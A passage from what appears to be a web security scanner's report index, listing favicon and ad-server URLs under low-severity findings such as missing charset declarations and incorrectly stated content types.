24.362. http://www.genealogy.com/favicon.ico

24.363. http://www.gf2ube.com/favicon.ico

24.364. http://www.gifts.com/favicon.ico

24.365. http://www.godaddy.com/favicon.ico

24.366. http://www.gofreecredit.com/favicon.ico

24.367. http://www.goodreads.com/favicon.ico

24.368. http://www.google-analytics.com/__utm.gif

24.369. http://www.google.ca/favicon.ico

24.370. http://www.google.co.uk/favicon.ico

24.371. http://www.googleadservices.com/pagead/conversion/1012592563/

24.372. http://www.gossipcenter.com/favicon.ico

24.373. http://www.gourmandia.com/favicon.ico

24.374. http://www.gravity.com/favicon.ico

24.375. http://www.greatschools.org/favicon.ico

24.376. http://www.greenwichmeantime.com/favicon.ico

24.377. http://www.groupon.com/favicon.ico

24.378. http://www.guardian.co.uk/favicon.ico

24.379. http://www.guitarcenter.com/favicon.ico

24.380. http://www.hallmark.com/favicon.ico

24.381. http://www.hayneedle.com/favicon.ico

24.382. http://www.hbo.com/favicon.ico

24.383. http://www.health.com/favicon.ico

24.384. http://www.healthcare.com/favicon.ico

24.385. http://www.healthcentral.com/favicon.ico

24.386. http://www.healthgrades.com/favicon.ico

24.387. http://www.healthline.com/favicon.ico

24.388. http://www.helium.com/favicon.ico

24.389. http://www.hgtv.com/favicon.ico

24.390. http://www.hhs.gov/favicon.ico

24.391. http://www.hi5.com/favicon.ico

24.392. http://www.hiexpress.com/favicon.ico

24.393. http://www.hilton.com/favicon.ico

24.394. http://www.history.com/favicon.ico

24.395. http://www.holidayinn.com/favicon.ico

24.396. http://www.hollywood.com/favicon.ico

24.397. http://www.hollywoodlife.com/favicon.ico

24.398. http://www.hollywoodreporter.com/favicon.ico

24.399. http://www.home-remedies-for-you.com/favicon.ico

24.400. http://www.homedepot.com/favicon.ico

24.401. http://www.homegain.com/favicon.ico

24.402. http://www.homes.com/favicon.ico

24.403. http://www.homestead.com/favicon.ico

24.404. http://www.hometownlocator.com/favicon.ico

24.405. http://www.hotels.com/favicon.ico

24.406. http://www.hotfrog.com/favicon.ico

24.407. http://www.hotwire.com/favicon.ico

24.408. http://www.house.gov/favicon.ico

24.409. http://www.howstuffworks.com/favicon.ico

24.410. http://www.howtodothings.com/favicon.ico

24.411. http://www.hp.com/favicon.ico

24.412. http://www.hsbccreditcard.com/favicon.ico

24.413. http://www.hsn.com/favicon.ico

24.414. http://www.hud.gov/favicon.ico

24.415. http://www.huffingtonpost.com/favicon.ico

24.416. http://www.hulu.com/favicon.ico

24.417. http://www.ichotelsgroup.com/favicon.ico

24.418. http://www.icontact.com/favicon.ico

24.419. http://www.identityguard.com/favicon.ico

24.420. http://www.ikea.com/favicon.ico

24.421. http://www.ilike.com/favicon.ico

24.422. http://www.iloveindia.com/favicon.ico

24.423. http://www.imageshack.us/favicon.ico

24.424. http://www.imdb.com/favicon.ico

24.425. http://www.imesh.com/favicon.ico

24.426. http://www.in.gov/favicon.ico

24.427. http://www.inbox.com/favicon.ico

24.428. http://www.inc.com/favicon.ico

24.429. http://www.indeed.com/favicon.ico

24.430. http://www.indiatimes.com/favicon.ico

24.431. http://www.info.com/favicon.ico

24.432. http://www.infoplease.com/favicon.ico

24.433. http://www.infowars.com/favicon.ico

24.434. http://www.ingdirect.com/favicon.ico

24.435. http://www.insiderpages.com/favicon.ico

24.436. http://www.instructables.com/favicon.ico

24.437. http://www.intel.com/favicon.ico

24.438. http://www.intellicast.com/favicon.ico

24.439. http://www.intuit.com/favicon.ico

24.440. http://www.iobit.com/favicon.ico

24.441. http://www.ioffer.com/favicon.ico

24.442. http://www.irs.gov/favicon.ico

24.443. http://www.issuu.com/favicon.ico

24.444. http://www.istockphoto.com/favicon.ico

24.445. http://www.iwin.com/favicon.ico

24.446. http://www.jcpenney.com/favicon.ico

24.447. http://www.jcwhitney.com/favicon.ico

24.448. http://www.jihadwatch.org/favicon.ico

24.449. http://www.joann.com/favicon.ico

24.450. http://www.job.com/favicon.ico

24.451. http://www.jobsonline.net/favicon.ico

24.452. http://www.jstor.org/favicon.ico

24.453. http://www.jtv.com/favicon.ico

24.454. http://www.justanswer.com/favicon.ico

24.455. http://www.justin.tv/favicon.ico

24.456. http://www.justluxe.com/favicon.ico

24.457. http://www.kaboodle.com/favicon.ico

24.458. http://www.kaboose.com/favicon.ico

24.459. http://www.kaspersky.com/favicon.ico

24.460. http://www.kayak.com/favicon.ico

24.461. http://www.kazaa.com/favicon.ico

24.462. http://www.kbb.com/favicon.ico

24.463. http://www.kcom.com/

24.464. http://www.kenexa.com/favicon.ico

24.465. http://www.killerstartups.com/favicon.ico

24.466. http://www.king.com/favicon.ico

24.467. http://www.kmart.com/favicon.ico

24.468. http://www.kodak.com/favicon.ico

24.469. http://www.kodakgallery.com/favicon.ico

24.470. http://www.kraftrecipes.com/favicon.ico

24.471. http://www.krillion.com/favicon.ico

24.472. http://www.lanebryant.com/favicon.ico

24.473. http://www.last.fm/favicon.ico

24.474. http://www.latimes.com/favicon.ico

24.475. http://www.legacy.com/favicon.ico

24.476. http://www.letssingit.com/favicon.ico

24.477. http://www.levi.com/favicon.ico

24.478. http://www.lg.com/favicon.ico

24.479. http://www.life123.com/favicon.ico

24.480. http://www.lifescript.com/favicon.ico

24.481. http://www.lijit.com/favicon.ico

24.482. http://www.like.com/favicon.ico

24.483. http://www.lingospot.com/favicon.ico

24.484. http://www.linkedin.com/favicon.ico

24.485. http://www.liutilities.com/favicon.ico

24.486. http://www.livecams.com/favicon.ico

24.487. http://www.livejournal.com/favicon.ico

24.488. http://www.livenation.com/favicon.ico

24.489. http://www.llbean.com/favicon.ico

24.490. http://www.loc.gov/favicon.ico

24.491. http://www.local.com/favicon.ico

24.492. http://www.localguides.com/favicon.ico

24.493. http://www.localpages.com/favicon.ico

24.494. http://www.lowermybills.com/favicon.ico

24.495. http://www.lowes.com/favicon.ico

24.496. http://www.lowfares.com/favicon.ico

24.497. http://www.lyrics007.com/favicon.ico

24.498. http://www.lyricsmode.com/favicon.ico

24.499. http://www.macraesbluebook.com/favicon.ico

24.500. http://www.macrumors.com/favicon.ico

24.501. http://www.macys.com/favicon.ico

24.502. http://www.made-in-china.com/favicon.ico

24.503. http://www.mail.com/favicon.ico

24.504. http://www.mainstreet.com/favicon.ico

24.505. http://www.manualsonline.com/favicon.ico

24.506. http://www.mapquest.com/favicon.ico

24.507. http://www.mapsofworld.com/favicon.ico

24.508. http://www.marriott.com/favicon.ico

24.509. http://www.marthastewart.com/favicon.ico

24.510. http://www.marykay.com/favicon.ico

24.511. http://www.mastercard.com/favicon.ico

24.512. http://www.match.com/favicon.ico

24.513. http://www.mate1.net/favicon.ico

24.514. http://www.maxim.com/favicon.ico

24.515. http://www.mayoclinic.com/favicon.ico

24.516. http://www.mcafee.com/favicon.ico

24.517. http://www.medcohealth.com/favicon.ico

24.518. http://www.mediaite.com/favicon.ico

24.519. http://www.medicalnewstoday.com/favicon.ico

24.520. http://www.medicare.gov/favicon.ico

24.521. http://www.medscape.com/favicon.ico

24.522. http://www.meebo.com/favicon.ico

24.523. http://www.meetlocals.com/favicon.ico

24.524. http://www.meetup.com/favicon.ico

24.525. http://www.megaupload.com/favicon.ico

24.526. http://www.menshealth.com/favicon.ico

24.527. http://www.menuism.com/favicon.ico

24.528. http://www.menupages.com/favicon.ico

24.529. http://www.merchantcircle.com/favicon.ico

24.530. http://www.merck.com/favicon.ico

24.531. http://www.mercola.com/favicon.ico

24.532. http://www.metacafe.com/favicon.ico

24.533. http://www.metafilter.com/favicon.ico

24.534. http://www.metrolyrics.com/favicon.ico

24.535. http://www.metromix.com/favicon.ico

24.536. http://www.metropcs.com/favicon.ico

24.537. http://www.mgid.com/favicon.ico

24.538. http://www.miamiherald.com/favicon.ico

24.539. http://www.michaels.com/favicon.ico

24.540. http://www.michigan.gov/favicon.ico

24.541. http://www.microsofttranslator.com/favicon.ico

24.542. http://www.military.com/favicon.ico

24.543. http://www.mindjolt.com/favicon.ico

24.544. http://www.miracleworkers.com/favicon.ico

24.545. http://www.mlb.com/favicon.ico

24.546. http://www.mlive.com/favicon.ico

24.547. http://www.mocospace.com/favicon.ico

24.548. http://www.modelmayhem.com/favicon.ico

24.549. http://www.momswhothink.com/favicon.ico

24.550. http://www.moviesunlimited.com/favicon.ico

24.551. http://www.movietickets.com/favicon.ico

24.552. http://www.mozilla.com/favicon.ico

24.553. http://www.mp3lyrics.org/favicon.ico

24.554. http://www.mp3raid.com/favicon.ico

24.555. http://www.mrmovietimes.com/favicon.ico

24.556. http://www.msnbc.com/favicon.ico

24.557. http://www.mtv.com/favicon.ico

24.558. http://www.multimap.com/favicon.ico

24.559. http://www.musiciansfriend.com/favicon.ico

24.560. http://www.mybloglog.com/favicon.ico

24.561. http://www.mycokerewards.com/favicon.ico

24.562. http://www.mycricket.com/favicon.ico

24.563. http://www.myheritage.com/favicon.ico

24.564. http://www.mylife.com/favicon.ico

24.565. http://www.mylifetime.com/favicon.ico

24.566. http://www.mynewplace.com/favicon.ico

24.567. http://www.mysanantonio.com/favicon.ico

24.568. http://www.myspace.com/favicon.ico

24.569. http://www.mystart.com/favicon.ico

24.570. http://www.myxer.com/favicon.ico

24.571. http://www.myyearbook.com/favicon.ico

24.572. http://www.nadaguides.com/favicon.ico

24.573. http://www.nasa.gov/favicon.ico

24.574. http://www.nationalgeographic.com/favicon.ico

24.575. http://www.navy.mil/favicon.ico

24.576. http://www.nba.com/favicon.ico

24.577. http://www.nbc.com/favicon.ico

24.578. http://www.nbcnewyork.com/favicon.ico

24.579. http://www.ncm.com/favicon.ico

24.580. http://www.netflix.com/favicon.ico

24.581. http://www.netquote.com/favicon.ico

24.582. http://www.netsuite.com/favicon.ico

24.583. http://www.newegg.com/favicon.ico

24.584. http://www.newgrounds.com/favicon.ico

24.585. http://www.newport-news.com/favicon.ico

24.586. http://www.newsbucket.co.uk/favicon.ico

24.587. http://www.newser.com/favicon.ico

24.588. http://www.newsinc.com/favicon.ico

24.589. http://www.newsmax.com/favicon.ico

24.590. http://www.newsok.com/favicon.ico

24.591. http://www.newsvine.com/favicon.ico

24.592. http://www.newsweek.com/favicon.ico

24.593. http://www.nextel.com/favicon.ico

24.594. http://www.nextinsure.com/favicon.ico

24.595. http://www.nfl.com/favicon.ico

24.596. http://www.nhl.com/favicon.ico

24.597. http://www.nickjr.com/favicon.ico

24.598. http://www.nih.gov/favicon.ico

24.599. http://www.nike.com/favicon.ico

24.600. http://www.nintendo.com/favicon.ico

24.601. http://www.nola.com/favicon.ico

24.602. http://www.northerntool.com/favicon.ico

24.603. http://www.notebookreview.com/favicon.ico

24.604. http://www.npr.org/favicon.ico

24.605. http://www.nps.gov/favicon.ico

24.606. http://www.nwsource.com/favicon.ico

24.607. http://www.nydailynews.com/favicon.ico

24.608. http://www.nypost.com/favicon.ico

24.609. http://www.nytimes.com/favicon.ico

24.610. http://www.ocregister.com/favicon.ico

24.611. http://www.octonet.com/favicon.ico

24.612. http://www.officedepot.com/favicon.ico

24.613. http://www.officemax.com/favicon.ico

24.614. http://www.olivegarden.com/favicon.ico

24.615. http://www.onemanga.com/favicon.ico

24.616. http://www.onlywire.com/favicon.ico

24.617. http://www.oodle.com/favicon.ico

24.618. http://www.opentable.com/favicon.ico

24.619. http://www.opera.com/favicon.ico

24.620. http://www.opinionlab.com/favicon.ico

24.621. http://www.opm.gov/favicon.ico

24.622. http://www.opportunity.co/favicon.ico

24.623. http://www.oprah.com/favicon.ico

24.624. http://www.oracle.com/favicon.ico

24.625. http://www.orbitz.com/favicon.ico

24.626. http://www.orchardbank.com/favicon.ico

24.627. http://www.oregonlive.com/favicon.ico

24.628. http://www.orientaltrading.com/favicon.ico

24.629. http://www.ourstage.com/favicon.ico

24.630. http://www.overstock.com/favicon.ico

24.631. http://www.ovguide.com/favicon.ico

24.632. http://www.parenting.com/favicon.ico

24.633. http://www.parentsconnect.com/favicon.ico

24.634. http://www.partstore.com/favicon.ico

24.635. http://www.partypoker.com/favicon.ico

24.636. http://www.payless.com/favicon.ico

24.637. http://www.paypal.com/favicon.ico

24.638. http://www.pbs.org/favicon.ico

24.639. http://www.pchlotto.com/favicon.ico

24.640. http://www.pcmag.com/favicon.ico

24.641. http://www.pctools.com/favicon.ico

24.642. http://www.pcworld.com/favicon.ico

24.643. http://www.people.com/favicon.ico

24.644. http://www.peoplefinders.com/favicon.ico

24.645. http://www.peopleofwalmart.com/favicon.ico

24.646. http://www.peoplestylewatch.com/favicon.ico

24.647. http://www.petco.com/favicon.ico

24.648. http://www.petfinder.com/favicon.ico

24.649. http://www.petside.com/favicon.ico

24.650. http://www.petsmart.com/favicon.ico

24.651. http://www.pga.com/favicon.ico

24.652. http://www.pgatour.com/favicon.ico

24.653. http://www.philly.com/favicon.ico

24.654. http://www.phoenix.edu/favicon.ico

24.655. http://www.pickyourown.org/favicon.ico

24.656. http://www.picnik.com/favicon.ico

24.657. http://www.picsearch.com/favicon.ico

24.658. http://www.pillsbury.com/favicon.ico

24.659. http://www.pipl.com/favicon.ico

24.660. http://www.pittsburghlive.com/favicon.ico

24.661. http://www.playdom.com/favicon.ico

24.662. http://www.playfin.com/favicon.ico

24.663. http://www.pnc.com/favicon.ico

24.664. http://www.pogo.com/favicon.ico

24.665. http://www.pokerstars.com/favicon.ico

24.666. http://www.politico.com/favicon.ico

24.667. http://www.politicsdaily.com/favicon.ico

24.668. http://www.pollmonkey.com/favicon.ico

24.669. http://www.polyvore.com/favicon.ico

24.670. http://www.popcap.com/favicon.ico

24.671. http://www.poptropica.com/favicon.ico

24.672. http://www.popularscreensavers.com/favicon.ico

24.673. http://www.potterybarn.com/favicon.ico

24.674. http://www.pricegong.com/favicon.ico

24.675. http://www.primarygames.com/favicon.ico

24.676. http://www.prlog.org/favicon.ico

24.677. http://www.progressive.com/favicon.ico

24.678. http://www.pronto.com/favicon.ico

24.679. http://www.psu.edu/favicon.ico

24.680. http://www.publicrecords.com/favicon.ico

24.681. http://www.purdue.edu/favicon.ico

24.682. http://www.purplemath.com/favicon.ico

24.683. http://www.qualityhealth.com/favicon.ico

24.684. http://www.qualtrics.com/favicon.ico

24.685. http://www.questia.com/favicon.ico

24.686. http://www.quotegarden.com/favicon.ico

24.687. http://www.qwest.com/favicon.ico

24.688. http://www.radioshack.com/favicon.ico

24.689. http://www.rawtube.com/favicon.ico

24.690. http://www.reachlocal.com/favicon.ico

24.691. http://www.realage.com/favicon.ico

24.692. http://www.realsimple.com/favicon.ico

24.693. http://www.realtor.com/favicon.ico

24.694. http://www.redbox.com/favicon.ico

24.695. http://www.reddit.com/favicon.ico

24.696. http://www.redorbit.com/favicon.ico

24.697. http://www.reference.com/favicon.ico

24.698. http://www.regions.com/favicon.ico

24.699. http://www.registrydefender.com/favicon.ico

24.700. http://www.rei.com/favicon.ico

24.701. http://www.rent.com/favicon.ico

24.702. http://www.rentals.com/favicon.ico

24.703. http://www.reply.com/favicon.ico

24.704. http://www.retailmenot.com/favicon.ico

24.705. http://www.retrevo.com/favicon.ico

24.706. http://www.reuters.com/favicon.ico

24.707. http://www.ripoffreport.com/favicon.ico

24.708. http://www.riteaid.com/favicon.ico

24.709. http://www.rivals.com/favicon.ico

24.710. http://www.rollingstone.com/favicon.ico

24.711. http://www.rotoworld.com/favicon.ico

24.712. http://www.rottentomatoes.com/favicon.ico

24.713. http://www.roxwel.com/favicon.ico

24.714. http://www.rr.com/favicon.ico

24.715. http://www.rss2search.com/favicon.ico

24.716. http://www.runescape.com/favicon.ico

24.717. http://www.sacbee.com/favicon.ico

24.718. http://www.safeway.com/favicon.ico

24.719. http://www.salesforce.com/favicon.ico

24.720. http://www.salon.com/favicon.ico

24.721. http://www.samsclub.com/favicon.ico

24.722. http://www.savings.com/favicon.ico

24.723. http://www.sbnation.com/favicon.ico

24.724. http://www.scholastic.com/favicon.ico

24.725. http://www.sciencedaily.com/favicon.ico

24.726. http://www.scottrade.com/favicon.ico

24.727. http://www.scout.com/favicon.ico

24.728. http://www.scribd.com/favicon.ico

24.729. http://www.sears.com/favicon.ico

24.730. http://www.seattlepi.com/favicon.ico

24.731. http://www.sendspace.com/favicon.ico

24.732. http://www.seniorpeoplemeet.com/favicon.ico

24.733. http://www.sephora.com/favicon.ico

24.734. http://www.sfgate.com/favicon.ico

24.735. http://www.shangri-la.com/favicon.ico

24.736. http://www.sharebuilder.com/favicon.ico

24.737. http://www.shockwave.com/favicon.ico

24.738. http://www.shoebuy.com/favicon.ico

24.739. http://www.shop.com/favicon.ico

24.740. http://www.shopathome.com/favicon.ico

24.741. http://www.shopcompanion.com/favicon.ico

24.742. http://www.shopping.com/favicon.ico

24.743. http://www.shopstyle.com/favicon.ico

24.744. http://www.shopzilla.com/favicon.ico

24.745. http://www.shutterfly.com/favicon.ico

24.746. http://www.simon.com/favicon.ico

24.747. http://www.simplyhired.com/favicon.ico

24.748. http://www.sing365.com/favicon.ico

24.749. http://www.singlesnet.com/favicon.ico

24.750. http://www.sky.com/favicon.ico

24.751. http://www.skype.com/favicon.ico

24.752. http://www.slate.com/favicon.ico

24.753. http://www.slide.com/favicon.ico

24.754. http://www.slideshare.net/favicon.ico

24.755. http://www.smarter.com/favicon.ico

24.756. http://www.smilebox.com/favicon.ico

24.757. http://www.smugmug.com/favicon.ico

24.758. http://www.snagajob.com/favicon.ico

24.759. http://www.snapfish.com/favicon.ico

24.760. http://www.socialsecurity.gov/favicon.ico

24.761. http://www.sodahead.com/favicon.ico

24.762. http://www.soft32.com/favicon.ico

24.763. http://www.soft82.com/favicon.ico

24.764. http://www.softonic.com/favicon.ico

24.765. http://www.softpedia.com/favicon.ico

24.766. http://www.songlyrics.com/favicon.ico

24.767. http://www.sony.com/favicon.ico

24.768. http://www.southwest.com/favicon.ico

24.769. http://www.spanishdict.com/favicon.ico

24.770. http://www.sparkpeople.com/favicon.ico

24.771. http://www.spellingcity.com/favicon.ico

24.772. http://www.spike.com/favicon.ico

24.773. http://www.spokeo.com/favicon.ico

24.774. http://www.sportsauthority.com/favicon.ico

24.775. http://www.sportsmansguide.com/favicon.ico

24.776. http://www.sportsnetwork.com/favicon.ico

24.777. http://www.springerlink.com/favicon.ico

24.778. http://www.sprint.com/favicon.ico

24.779. http://www.squidoo.com/favicon.ico

24.780. http://www.ssa.gov/favicon.ico

24.781. http://www.stanford.edu/favicon.ico

24.782. http://www.star-telegram.com/favicon.ico

24.783. http://www.starpulse.com/favicon.ico

24.784. http://www.startribune.com/favicon.ico

24.785. http://www.state.gov/favicon.ico

24.786. http://www.state.tn.us/favicon.ico

24.787. http://www.statefarm.com/favicon.ico

24.788. http://www.stateuniversity.com/favicon.ico

24.789. http://www.steadyhealth.com/favicon.ico

24.790. http://www.stltoday.com/favicon.ico

24.791. http://www.stlyrics.com/favicon.ico

24.792. http://www.stumbleupon.com/favicon.ico

24.793. http://www.stylelist.com/favicon.ico

24.794. http://www.suite101.com/favicon.ico

24.795. http://www.suntimes.com/favicon.ico

24.796. http://www.superiorpics.com/favicon.ico

24.797. http://www.superpages.com/favicon.ico

24.798. http://www.symantec.com/favicon.ico

24.799. http://www.t-mobile.com/favicon.ico

24.800. http://www.tagged.com/favicon.ico

24.801. http://www.talkingpointsmemo.com/favicon.ico

24.802. http://www.tampabay.com/favicon.ico

24.803. http://www.target.com/favicon.ico

24.804. http://www.tastebook.com/favicon.ico

24.805. http://www.techbargains.com/favicon.ico

24.806. http://www.telegraph.co.uk/favicon.ico

24.807. http://www.terra.com/favicon.ico

24.808. http://www.textsfromlastnight.com/favicon.ico

24.809. http://www.theatlantic.com/favicon.ico

24.810. http://www.thedailybeast.com/favicon.ico

24.811. http://www.thedailyshow.com/favicon.ico

24.812. http://www.thedietsolutionprogram.com/favicon.ico

24.813. http://www.theepochtimes.com/favicon.ico

24.814. http://www.thefind.com/favicon.ico

24.815. http://www.thefreedictionary.com/favicon.ico

24.816. http://www.thefreelibrary.com/favicon.ico

24.817. http://www.thefrisky.com/favicon.ico

24.818. http://www.theglobeandmail.com/favicon.ico

24.819. http://www.theonion.com/favicon.ico

24.820. http://www.thesaurus.com/favicon.ico

24.821. http://www.thirdage.com/favicon.ico

24.822. http://www.thisis50.com/favicon.ico

24.823. http://www.thisoldhouse.com/favicon.ico

24.824. http://www.thomasnet.com/favicon.ico

24.825. http://www.thriftyfun.com/favicon.ico

24.826. http://www.ticketmaster.com/favicon.ico

24.827. http://www.tickets.com/favicon.ico

24.828. http://www.ticketsnow.com/favicon.ico

24.829. http://www.tigerdirect.com/favicon.ico

24.830. http://www.time.com/favicon.ico

24.831. http://www.timeanddate.com/favicon.ico

24.832. http://www.timewarnercable.com/favicon.ico

24.833. http://www.tinypic.com/favicon.ico

24.834. http://www.tmz.com/favicon.ico

24.835. http://www.tomshardware.com/favicon.ico

24.836. http://www.topix.com/favicon.ico

24.837. http://www.topix.net/favicon.ico

24.838. http://www.topshareware.com/favicon.ico

24.839. http://www.toptenreviews.com/favicon.ico

24.840. http://www.totalbeauty.com/favicon.ico

24.841. http://www.townhall.com/favicon.ico

24.842. http://www.toyota.com/favicon.ico

24.843. http://www.toysrus.com/favicon.ico

24.844. http://www.trafficrevenue.net/favicon.ico

24.845. http://www.trails.com/favicon.ico

24.846. http://www.travel-ticker.com/favicon.ico

24.847. http://www.travelocity.com/favicon.ico

24.848. http://www.travelpod.com/favicon.ico

24.849. http://www.travelzoo.com/favicon.ico

24.850. http://www.trendmicro.com/favicon.ico

24.851. http://www.tripadvisor.com/favicon.ico

24.852. http://www.tripzen.com/favicon.ico

24.853. http://www.true.com/favicon.ico

24.854. http://www.trulia.com/favicon.ico

24.855. http://www.truste.com/favicon.ico

24.856. http://www.tv.com/favicon.ico

24.857. http://www.tvguide.com/favicon.ico

24.858. http://www.tvtxtr.com/favicon.ico

24.859. http://www.ucomparehealthcare.com/favicon.ico

24.860. http://www.ufc.com/favicon.ico

24.861. http://www.uhaul.com/favicon.ico

24.862. http://www.ultimate-guitar.com/favicon.ico

24.863. http://www.umich.edu/favicon.ico

24.864. http://www.univision.com/favicon.ico

24.865. http://www.ups.com/favicon.ico

24.866. http://www.uptake.com/favicon.ico

24.867. http://www.urbanspoon.com/favicon.ico

24.868. http://www.usa-people-search.com/favicon.ico

24.869. http://www.usajobs.gov/favicon.ico

24.870. http://www.usatoday.com/favicon.ico

24.871. http://www.usbank.com/favicon.ico

24.872. http://www.use.com/favicon.ico

24.873. http://www.usgs.gov/favicon.ico

24.874. http://www.usmagazine.com/favicon.ico

24.875. http://www.usps.com/favicon.ico

24.876. http://www.ussearch.com/favicon.ico

24.877. http://www.ustream.tv/favicon.ico

24.878. http://www.utorrent.com/favicon.ico

24.879. http://www.va.gov/favicon.ico

24.880. http://www.vanguard.com/favicon.ico

24.881. http://www.vast.com/favicon.ico

24.882. http://www.veoh.com/favicon.ico

24.883. http://www.verisign.com/favicon.ico

24.884. http://www.vh1.com/favicon.ico

24.885. http://www.victoriassecret.com/favicon.ico

24.886. http://www.videobash.com/favicon.ico

24.887. http://www.videojug.com/favicon.ico

24.888. http://www.videosurf.com/favicon.ico

24.889. http://www.viewpoints.com/favicon.ico

24.890. http://www.villagevoice.com/favicon.ico

24.891. http://www.vimeo.com/favicon.ico

24.892. http://www.virginia.gov/favicon.ico

24.893. http://www.virginmobileusa.com/favicon.ico

24.894. http://www.vistaprint.com/favicon.ico

24.895. http://www.vitals.com/favicon.ico

24.896. http://www.vrbo.com/favicon.ico

24.897. http://www.walgreens.com/favicon.ico

24.898. http://www.walletpop.com/favicon.ico

24.899. http://www.walmart.com/favicon.ico

24.900. http://www.wapedia.mobi/favicon.ico

24.901. http://www.warnerbros.com/favicon.ico

24.902. http://www.washingtonpost.com/favicon.ico

24.903. http://www.weather.com/favicon.ico

24.904. http://www.weather.gov/favicon.ico

24.905. http://www.weatherbug.com/favicon.ico

24.906. http://www.webcrawler.com/favicon.ico

24.907. http://www.webgains.com/favicon.ico

24.908. http://www.webmd.com/favicon.ico

24.909. http://www.webring.org/favicon.ico

24.910. http://www.webs.com/favicon.ico

24.911. http://www.webshots.com/favicon.ico

24.912. http://www.weightwatchers.com/favicon.ico

24.913. http://www.wellness.com/favicon.ico

24.914. http://www.wellsfargo.com/favicon.ico

24.915. http://www.wendys.com/favicon.ico

24.916. http://www.wetpaint.com/favicon.ico

24.917. http://www.where2getit.com/favicon.ico

24.918. http://www.whitepages.com/favicon.ico

24.919. http://www.wikia.com/favicon.ico

24.920. http://www.wikimapia.org/favicon.ico

24.921. http://www.wikimedia.org/favicon.ico

24.922. http://www.wikio.com/favicon.ico

24.923. http://www.wimp.com/favicon.ico

24.924. http://www.winbuyer.com/favicon.ico

24.925. http://www.wired.com/favicon.ico

24.926. http://www.wisegeek.com/favicon.ico

24.927. http://www.wix.com/favicon.ico

24.928. http://www.womansday.com/favicon.ico

24.929. http://www.wonderhowto.com/favicon.ico

24.930. http://www.worldwinner.com/favicon.ico

24.931. http://www.worthpoint.com/favicon.ico

24.932. http://www.wowhead.com/favicon.ico

24.933. http://www.wowwiki.com/favicon.ico

24.934. http://www.wsbtv.com/favicon.ico

24.935. http://www.wunderground.com/favicon.ico

24.936. http://www.wwe.com/favicon.ico

24.937. http://www.xanga.com/favicon.ico

24.938. http://www.xe.com/favicon.ico

24.939. http://www.yakaz.com/favicon.ico

24.940. http://www.yallwire.com/favicon.ico

24.941. http://www.yardbarker.com/favicon.ico

24.942. http://www.yellow.com/favicon.ico

24.943. http://www.yellowbook.com/favicon.ico

24.944. http://www.yellowpages.com/favicon.ico

24.945. http://www.yelp.com/favicon.ico

24.946. http://www.yidio.com/favicon.ico

24.947. http://www.younghollywood.com/favicon.ico

24.948. http://www.yourdictionary.com/favicon.ico

24.949. http://www.yourfilehost.com/favicon.ico

24.950. http://www.yuku.com/favicon.ico

24.951. http://www.zabasearch.com/favicon.ico

24.952. http://www.zap2it.com/favicon.ico

24.953. http://www.zappos.com/favicon.ico

24.954. http://www.zazzle.com/favicon.ico

24.955. http://www.zillow.com/favicon.ico

24.956. http://www.zimbio.com/favicon.ico

24.957. http://www.ziprealty.com/favicon.ico

24.958. http://www.zmags.com/favicon.ico

24.959. http://www.zoosk.com/favicon.ico

24.960. http://www.zshare.net/favicon.ico

24.961. http://www.zvents.com/favicon.ico

24.962. http://www.zynga.com/favicon.ico

25. HTML does not specify charset

25.1. https://activresa-secure2.icor.fr/

25.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

25.3. http://fls.doubleclick.net/activityi

25.4. http://www.avast.com/favicon.ico

25.5. http://www.billsnitzer.com/favicon.ico

25.6. http://www.cheetahmail.com/favicon.ico

25.7. http://www.chinaontv.com/favicon.ico

25.8. http://www.citibank.com/favicon.ico

25.9. http://www.cobaltnitra.com/favicon.ico

25.10. http://www.coolmath.com/favicon.ico

25.11. http://www.coolmath4kids.com/favicon.ico

25.12. http://www.crocoads.com/favicon.ico

25.13. http://www.drudgereport.com/favicon.ico

25.14. http://www.dt00.net/favicon.ico

25.15. http://www.ehow.co.uk/favicon.ico

25.16. http://www.elyricsworld.com/favicon.ico

25.17. http://www.epinions.com/favicon.ico

25.18. http://www.fark.com/favicon.ico

25.19. http://www.firecue.com/favicon.ico

25.20. http://www.freedownloadscenter.com/favicon.ico

25.21. http://www.freeze.com/favicon.ico

25.22. http://www.hbo.com/favicon.ico

25.23. http://www.iloveindia.com/favicon.ico

25.24. http://www.intuit.com/favicon.ico

25.25. http://www.iwin.com/favicon.ico

25.26. http://www.lingospot.com/favicon.ico

25.27. http://www.moviesunlimited.com/favicon.ico

25.28. http://www.music-oasis.com/favicon.ico

25.29. http://www.olpinhoopes.com/favicon.ico

25.30. http://www.rmloader.com/favicon.ico

25.31. http://www.samsung.com/favicon.ico

25.32. http://www.socialsurveys.us/favicon.ico

25.33. http://www.sparkstudios.com/favicon.ico

25.34. http://www.springerlink.com/favicon.ico

25.35. http://www.swagbucks.com/favicon.ico

25.36. http://www.thegrids.info/favicon.ico

25.37. http://www.tidaltv.com/favicon.ico

25.38. http://www.trafficrevenue.net/favicon.ico

25.39. http://www.verisign.com/favicon.ico

25.40. http://www.verizon.net/favicon.ico

25.41. http://www.woot.com/favicon.ico

25.42. http://www.xe.com/favicon.ico

25.43. http://www.y8.com/favicon.ico

25.44. http://www.yfrog.com/favicon.ico

26. HTML uses unrecognised charset

27. Content type incorrectly stated

27.1. http://www.123greetings.com/favicon.ico

27.2. http://www.2wire.net/favicon.ico

27.3. http://www.43things.com/favicon.ico

27.4. http://www.6waves.com/favicon.ico

27.5. http://www.aa.com/favicon.ico

27.6. http://www.aarp.org/favicon.ico

27.7. http://www.ad4game.com/favicon.ico

27.8. http://www.alibaba.com/favicon.ico

27.9. http://www.alibris.com/favicon.ico

27.10. http://www.allbusiness.com/favicon.ico

27.11. http://www.allvoices.com/favicon.ico

27.12. http://www.alphadictionary.com/favicon.ico

27.13. http://www.americantowns.com/favicon.ico

27.14. http://www.andiesisle.com/favicon.ico

27.15. http://www.andkon.com/favicon.ico

27.16. http://www.apartmenthomeliving.com/favicon.ico

27.17. http://www.apartmentratings.com/favicon.ico

27.18. http://www.arizona.edu/favicon.ico

27.19. http://www.aroundme.com/favicon.ico

27.20. http://www.articlesbase.com/favicon.ico

27.21. http://www.ask.com/favicon.ico

27.22. http://www.astrology.com/favicon.ico

27.23. http://www.autozone.com/favicon.ico

27.24. http://www.avast.com/favicon.ico

27.25. http://www.babelgum.com/favicon.ico

27.26. http://www.bankofamerica.com/favicon.ico

27.27. http://www.beezid.com/favicon.ico

27.28. http://www.blucigs.com/favicon.ico

27.29. http://www.blurtit.com/favicon.ico

27.30. http://www.boingboing.net/favicon.ico

27.31. http://www.bravotv.com/favicon.ico

27.32. http://www.breitbart.com/favicon.ico

27.33. http://www.buzzillions.com/favicon.ico

